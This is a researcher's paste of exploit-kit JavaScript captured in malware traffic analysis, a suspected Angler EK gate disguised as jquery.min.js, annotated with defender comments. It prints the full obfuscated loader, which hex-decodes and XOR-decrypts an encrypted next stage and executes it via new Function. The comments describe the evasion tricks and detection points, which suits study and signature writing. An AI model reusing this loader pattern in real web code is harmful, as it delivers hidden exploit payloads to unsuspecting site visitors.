Neonprimetime

Exploit Kit Javascript from Malware Traffic analysis

Jun 3rd, 2016
  1. Exploit Kit Javascript from Malware Traffic analysis
  2. http://www.malware-traffic-analysis.net/2016/06/02/index.html
  3. 212.231.130.9 port 80 - positivessl.online - GET /script/jquery.min.js - possibly a gate to Angler EK (unconfirmed)
  4.  
  5. *****
  6.  
  7.  
  // Analyst notes (defender view): this is a loader stub. It hex-decodes and
  // XOR-decrypts the blob below with a key supplied at call time, then executes
  // the result through new Function. The random-looking identifiers carry no
  // meaning; nothing in here is library code despite the jquery.min.js path
  // the sample was served from.
  8. function rKFlmZpAv(Mjk2MjkxMDI1MQ) {
         // `== null` also matches undefined: with no key nothing is decoded or run.
  9.     if (Mjk2MjkxMDI1MQ == null) {
  10.         return '';
  11.     }
          // Payload: the hex-encoded, XOR'ed next stage. Many characters are
          // written as \xNN string escapes (e.g. \x32 is "2"); every escape in the
          // visible literal resolves to a hex digit once the string is parsed, so
          // this is a second layer of obfuscation, likely aimed at defeating naive
          // regex extraction of the hex text from the raw file.
  12.     var MTEzMzMzNTAxOQ = "2b\x32123523b3\x642a5a6f0\x392b70793a7a3f7e7c350d3f7a\x3386c684e1\x6510273\x367b0c680830047f72241\x326650\x3112\x31\x37d01\x37\x3965621\x666818\x3340\x35\x37d407b736616132175\x304797d\x366\x31e6a2b\x338647d0778736e13133171057b466a7f6a6d3a6\x3475037b636a1\x3211027d647b57687\x6662683a7471027f507\x36072a5b2d617813133171057b43\x36\x617f6a6d3a6\x34750229636a1211027d\x3647b\x3026\x387f62683a747102\x37850667311\x3447f647350686f66\x36938477d6278166\x347319417f7477506a5c6a08380\x317f637113741\x37265f\x32f40702\x33\x3245f2b\x33b320f1c232b57754a293b2e4422312b407417265f2f4e700\x372a\x35b2d631e\x367282e\x32300104c1e\x3332753727319417f74760\x366a5c6a08380\x317f63771364631\x64407d4\x377b6\x376a0a091d08463c79666938477d6274166\x347319417f7477\x3036\x615\x636a0\x3838017f6377136\x34631d4\x307d477\x62656a1a680830047f72251\x32665011217d017961620f\x31d2\x36067\x300a0404696a6d3a6475027c636a1211027d64\x37a02687f62683a7471027e5\x30\x36673114\x34\x37f\x3647000686\x66666938477d62781664\x37319417f74760d6a5c\x36a\x308380\x317f6371137432035\x63\x3031f1f1770161\x332175047973661e6a2b38647d077a736e131\x333171057a436a7f6\x616d3a6\x3475\x3007a6\x336a1211027d647b5\x32687f62683a74\x371037850\x3667\x3311\x3447f647350686f6669384\x377d62781664731\x39417f7477506a5c6a0838017f63711364631d407d477a676a1\x61680830047f707312665011217d017\x386d\x362\x31f681834057d4\x32\x379736\x36161321750\x3479\x375661e6a2b38647d0778736e\x3131331710579126a7f6a6d3a6475027e636a121\x31027d6\x347b55687f\x36\x32\x3683a747103785\x307\x36033b670d001\x37096\x381834057d4\x31\x37f736616132175\x3047922661e6a2b38647d077b7\x33\x36e1313\x331\x371\x3057a4e6a6f0070376962683a7471027a50\x3667311447f64730d686f6\x366938477d6279\x31664731\x39417f7476016a5c6a0838" + 
"\x30\x317f62\x37d137423\x3144\x31264a6\x610838017f627\x641364631d407d477b616a1\x61680830047f727812\x3665\x30\x311217d017963621f681834\x3057\x644\x31757366161321\x375\x3047870660\x650f2\x32002c7016\x31321750\x347975661e6\x612b\x3386\x347d067f736e1313\x3317105\x37a\x3476a7f6a6d3a6475027\x61636\x611211027\x64647b\x354687f62683a747103\x379506\x3673\x311447f64\x37107686\x66666938477d6\x327516647319417f74770c6a\x35c6a\x30838017f6226136\x34631d40\x37\x64477\x62606a0a1f2e2852150\x337c1211027d647\x6202687f6268\x33a7471027f50667311447f64\x3730\x31686f\x3666938477d627c166\x34\x37319417f747601\x36\x615c6\x6108\x338\x3017\x66\x36270136\x34631d407d4779616a1a680\x383004\x37f7\x322212665011217d01796162\x31f681834057d41\x32973661\x36\x313217504\x379\x371661e6\x61\x32b38647d0\x372a73\x36e1\x331331710\x357a43\x36a6f1e5625367509681\x3834057d\x3407e736616\x31321\x3750\x347870661e6a\x32b38\x364\x37d06767\x33\x36e1313317105\x37b146a7\x666\x616d3a6475027a\x3637a662a\x31d2f657\x30\x31613\x32175047c\x375661e\x36\x612b38\x36\x347d0\x327c73\x37e67282\x652307\x370242a3\x652f0074072\x325e2d777c1211027d\x3647a01687f62683\x6174710\x332b5\x30667311447f64720\x37686f6669\x33847\x37d627416647319417f7476016a5c6a0838017f6\x327c136\x34631d\x34\x307d47\x37\x62326\x611a6\x380830047f7224126650112\x317d0\x317c35621f681834057d\x3417c736616\x3132\x31750479\x376661e6a2b38647d067c736\x65131331710\x357b116\x617f6a6d3a6475022c636a1\x3211027d647\x610\x34687f62\x3683a747102\x379506\x367311447f6\x347301686f66693\x38477d672f16647\x3319417f7477566a5c6a08\x338017f6270136463\x31d40\x37d477b6\x326a1a6808300\x347f737512665011217d\x3017c35621f68183405\x37d45297366\x31\x36132175047c75661e6\x612b38\x3647d02797\x336e1\x3313317\x31057e426a7\x666a6d3\x6164750777636a\x31211027d64\x37a\x30168\x37f62683a74710\x327550\x3667311\x3447f6\x3476566\x386f666938477d637916\x36473" + 
"1\x39417\x667477\x3536a\x35c6\x610838017f6\x33751364631d407\x64477e\x3356a1a680830047f7625\x31\x32\x366\x35011217d01\x37c65621\x6668\x31834057d\x3447b736616132\x31\x375047c72661e6a\x32b3\x3864\x37d027773\x36e13133171\x3057a476a7f6\x616d3\x6164750377637a\x3662a1\x64\x32f\x36070\x362283e2\x370\x64\x314143b582\x622d0a09657706193747667f12522715790f00703\x370978672\x382e2\x330776242a3e2\x6605\x31\x343\x33\x310\x34024197c662a1d2f6\x367662283e27001417265f2f471\x300f1f5308\x31102470619\x37c662a1d2f67\x37662283e2\x3700141\x37265f2\x662a707311447f6473\x30c6\x386f66\x369384\x377d637916647319417f747\x36016a5c6a0838017f63751364631d407d477e356a1a680830047f76271266501121\x37d0\x317d32621f68183405\x37d407e7366161321\x37504\x37870661e6\x612b38647\x64067d736e13133171057b\x3466a7f6a6d3a64750\x327c636a1211\x30\x327d647b09687f626\x383a7\x347\x3102785066\x37311447f647\x33066\x386f6\x36\x36938\x3477d627816647319417f747701\x36a5c\x36a\x3083\x38017f627\x34\x3136\x34631d407d477b666a1a680830047f7273126\x365011217d017937621f6818\x334057d417473\x3661\x3613217\x3504792166\x31e6a2b38647d0778736e13133171\x3057f126a7f6a6d3a\x36475037\x62636a1211027d647b096\x387f62\x3683a7471032b506673114\x347f647\x33\x350686\x66666938477d637d16\x3647319417f7\x3476066a5\x636a0838017\x6662231364631d407d477b316a1a68\x30830047\x6673721\x3266\x350\x311217d01\x37d3\x30621f681834057d412b736\x3616132175047921661\x656a2\x623\x386\x347d072c736e13133171057b\x34e6a7f6a6d3a6\x34\x375022a636a1211027d647b04\x368\x37f62683a7471\x307285066\x37311447\x66647307\x3686f666938477d622b1664731\x39417f7473506a\x35c6a08\x338017f6370136\x34631d407d\x3477b366\x611a680830047f762712665\x3011217d0\x317a6d621f681834057d407\x357366161321\x37\x35047\x3871661e6a2\x6238647d0\x34\x32e736e\x31313317105784e6\x617f6a6d3a6475017d" + 
"636\x61\x31211027d647f576\x387\x666268\x33\x617471027f506673\x31\x31447f\x3647000\x3686\x66666938477d622f166\x347319\x3417f7475506a5c6a0838017\x6662201\x3364\x36\x331d407\x644779376a1a680830\x304\x37f71\x37412665011217d017d32\x3621f6818\x334057\x64417b73661\x3613217504\x37b22661e6a2\x6238647d\x30777736e1313317105784f6a7f6a6d3a64750\x31776\x336a1211027d647b50687f62683a7\x3471\x3027d50667311447f647301686\x66\x366693\x384\x377d617416\x3647319417f7473536\x61\x35c6a0\x38\x338017f\x367751364\x3631d407d477e\x3646a1a68083\x30047f\x37776\x31\x32665011217d017c61621f6818340\x357d4\x347a7\x3366161\x332\x317\x35047d22661e6a2b386\x347d067c736e\x31313\x33171057b43\x36a7f\x36a\x36d3\x616475022b636a12110\x327\x64\x3647b\x355687f6\x32683a7471007950667311447f647205686f666938477\x64627\x66166473\x319417f7476026a5c6a0838017f62711364631d40\x37d4\x377a\x36c6a1a6808300\x347f7625126\x365011217d017c64621\x66681834057d\x344747\x336616132175047c7666\x31e6a2b38647d0279736e1\x33133171057e456a7f6a6d3a647507\x37f\x3636a1211027d64\x37f55687f62683a7471022c50667311447f647356686f666938477d627f16\x3647319417f\x37477026a\x35\x636a083\x38017f6\x33771364\x3631d407\x64477a636\x611a680830047f727912665011217d\x301796d621f681834\x3057d4\x35287366161\x332175047925661\x656a\x32b38647d067f736\x65131\x33317\x31057b406a\x36f1e5625367c6f3906287b25250e09656\x36390207601d6d1a0\x35102c0\x66010049\x36473626967\x31\x37265f2f436429403b29212\x6257\x33b2d2e5b6d\x31b\x32\x391\x611f5\x360\x6217231c663f3\x37543f570b1d\x300\x3433c6478472a30155c20122221390a39\x3353714090d0c473e467\x303\x302\x32523a39205a3b6a23\x35a290e762628453a262b\x31\x636e020\x38783f04\x37c6\x620b7802263604672\x38257b1f100917\x32b1d7e64\x36c0e0\x322e0401000d\x32667004b162e0b43676d680e307a4738297\x661\x64330177296\x63680e";
  13.  
          // Decoder. mGzITAbcX is the hex text, LQwkqFyv the XOR key; returns the
          // recovered next stage as a JS string. Every primitive it needs is
          // assembled from escapes so that no telltale API name appears literally.
  14.     function vrDCFrjI(mGzITAbcX, LQwkqFyv) {
  15.         var mkpCBAWTom = '';
  16.         var bXtcnEFMIs = String;
              // The unescape()/\u pieces concatenate to "fromCharCode"; looking it
              // up as String[...] hides the call from simple string matching on
              // "String.fromCharCode" — a useful signature for detection rules.
  17.         var SNrWHpBf = unescape("%66") + '\u0072' + '\u006f' + unescape("%6d") + unescape("%43") + '\u0068' + unescape("%61") + unescape("%72") + '\u0043' + unescape("%6f") + unescape("%64") + unescape("%65");
  18.         var sIzjTXsw = bXtcnEFMIs[SNrWHpBf];
              // unescape("%32") * 1 === 2: one byte per two hex characters.
  19.         var finHGSvVZ = unescape("%32") * 1;
              // '\u0031' + '\u0036' === "16"; multiplied by 1 below it is the parseInt radix.
  20.         var jwtQyMVaN = '\u0031' + '\u0036';
              // Pass 1: hex text -> raw byte string.
  21.         for (var i = 0; i < mGzITAbcX.length; i += finHGSvVZ) {
  22.             mkpCBAWTom += sIzjTXsw(parseInt(mGzITAbcX.substr(i, finHGSvVZ), jwtQyMVaN * 1));
  23.         }
  24.         var lplipQBCyJ = '';
              // Pass 2: repeating-key XOR of the byte string against the key.
              // Index quirk: the key offset wraps only when i > key length, so at
              // i === key length charCodeAt() yields NaN, which coerces to 0 in the
              // XOR and that single byte passes through unchanged.
              // VHTtsuGZF and ktTatISm are assigned without var, leaving implicit
              // globals on the page — an observable side effect of execution.
  25.         for (i = 0; i < mkpCBAWTom.length; i++) {
  26.             if (i > LQwkqFyv.length) VHTtsuGZF = i % (LQwkqFyv.length);
  27.             else VHTtsuGZF = i;
  28.             ktTatISm = sIzjTXsw(mkpCBAWTom.charCodeAt(i) ^ LQwkqFyv.charCodeAt(VHTtsuGZF));
  29.             lplipQBCyJ += ktTatISm;
  30.         }
  31.         return lplipQBCyJ;
  32.     }
         // Execution of the decoded text. new Function(...) is the eval-equivalent
         // here and the choke point where a sandbox or hooked Function/eval can
         // capture the next-stage code before it runs. NLxwWpg is another implicit
         // global; the call on the following line has no return value of interest.
  33.     NLxwWpg = new Function(vrDCFrjI(MTEzMzMzNTAxOQ, Mjk2MjkxMDI1MQ));
  34.     NLxwWpg();
  35. }
  // Entry point. Mjk2MjkxMDI1MQ (the XOR key) is not declared anywhere in this
  // listing; it is presumably defined by the delivering page or a companion
  // script — TODO confirm against the full capture. If it is truly undeclared
  // this line throws a ReferenceError; if it is null/undefined the loader
  // returns '' and executes nothing.
  36. rKFlmZpAv(Mjk2MjkxMDI1MQ);
  37.  
  38. *******
  39. *******
  40. *******
  41. More FROM @neonprimetime security
  42.  
  43. http://pastebin.com/u/Neonprimetime
  44. https://www.virustotal.com/en/USER/neonprimetime/
  45. https://twitter.com/neonprimetime
  46. https://www.reddit.com/USER/neonprimetime